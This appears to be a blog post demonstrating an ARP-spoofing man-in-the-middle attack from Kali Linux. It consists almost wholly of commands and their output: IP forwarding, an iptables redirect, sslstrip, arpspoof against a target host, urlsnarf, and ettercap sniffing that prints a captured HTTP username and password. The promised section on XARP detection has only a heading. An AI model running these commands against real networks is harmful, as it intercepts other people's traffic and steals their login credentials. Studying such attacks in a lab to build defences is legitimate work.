Demonstration of ARP Spoofing and Detection using XARP > Kali Linux

Demonstration of ARP Spoofing and Detection using XARP > Kali Linux

Networking Technologies

ARPSPOOFING:
Enable IP Forwarding:
root@kali:~# echo 1 >/proc/sys/net/ipv4/ip_forward

Edit Iptables:

root@kali:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080


Start SSL Striping:

root@kali:~# sslstrip -k -l 8080

sslstrip 0.9 by Moxie Marlinspike running...
Unhandled error in Deferred:
Unhandled Error
Traceback (most recent call last):
  File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 551, in _runCallbacks
    current.result = callback(current.result, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 250, in _checkTimeout
    userDeferred.callback(result)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 368, in callback
    self._startRunCallbacks(result)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 464, in _startRunCallbacks
    self._runCallbacks()
--- <exception caught here> ---
  File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 551, in _runCallbacks

Start Arpspoofing:
root@kali:~# arpspoof -i eth0 -t 192.168.0.101 192.168.0.1
0:50:56:28:47:21 0:24:1d:5e:c:2e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:28:47:21
0:50:56:28:47:21 0:24:1d:5e:c:2e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:28:47:21
0:50:56:28:47:21 0:24:1d:5e:c:2e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:28:47:21
0:50:56:28:47:21 0:24:1d:5e:c:2e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:28:47:21
0:50:56:28:47:21 0:24:1d:5e:c:2e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:28:47:21

Start Urlsnarf:
root@kali:~# urlsnarf -i eth0
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]
192.168.0.101 - - [25/Sep/2016:12:40:24 -0400] "POST http://null-byte.wonderhowto.com/ajax/keepalive/?rt=json&rn=1474821624046895.3245831087851 HTTP/1.1" - - "http://null-byte.wonderhowto.com/forum/struggling-perform-mitm-attack-using-ettercap-and-sslstrip-0165933/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0"
192.168.0.105 - - [25/Sep/2016:12:40:29 -0400] "POST http://null-byte.wonderhowto.com/ajax/keepalive/?rt=json&rn=1474821624046895.3245831087851 HTTP/1.0" - - "http://null-byte.wonderhowto.com/forum/struggling-perform-mitm-attack-using-ettercap-and-sslstrip-0165933/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0"
192.168.0.101 - - [25/Sep/2016:12:40:40 -0400] "GET http://ping.chartbeat.net/ping?h=wonderhowto.com&p=%2Fforum%2Fstruggling-perform-mitm-attack-using-ettercap-and-sslstrip-0165933%2F&u=fxyaizgJ0NDi5hPF&d=null-byte.wonderhowto.com&g=3214&g0=All%20Posts%2CForum%20Threads%2CNo%20Video%2Cnull-byte&g1=james987&n=0&f=00001&c=15.26&x=342&m=342&y=4394&o=1903&w=943&j=270&R=0&W=0&I=1&E=16&e=0&r=https%3A%2F%2Fwww.google.co.in%2F&b=3152&t=DeyLNPDPuT0zBtMKGVCVHFimBQsMUY&V=83&tz=-330&sn=13&EE=16&_ HTTP/1.1" - - "http://null-byte.wonderhowto.com/forum/struggling-perform-mitm-attack-using-ettercap-and-sslstrip-0165933/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0"
Start Ettercap:
root@kali:~# ettercap -T -q -i eth0

ettercap 0.8.0 copyright 2001-2013 Ettercap Development Team

Listening on:
  eth0 -> 00:50:56:28:47:21
       192.168.0.105/255.255.255.0
       fe80::250:56ff:fe28:4721/64

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

  33 plugins
  42 protocol dissectors
  57 ports monitored
16074 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

1 hosts added to the hosts list...
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

HTTP : 192.232.219.88:80 -> USER: prat  PASS: prat  INFO: http://xavierengg.com/
CONTENT: username=prat&password=prat&Submit=Log+in&option=com_users&task=user.login&return=aW5kZXgucGhwP0l0ZW1pZD0xMDE%3D&2dd60849c96b941a6be6545f5eb2846e=1

HTTP : 192.232.219.88:80 -> USER: prat  PASS: prat  INFO: /index.php
CONTENT: username=prat&password=prat&Submit=Log+in&option=com_users&task=user.login&return=aW5kZXgucGhwP0l0ZW1pZD0xMDE%3D&2dd60849c96b941a6be6545f5eb2846e=1



XARP:Protection From ARP Spoofing-


Comments

Popular posts from this blog

Intermediate Code Generation > C Program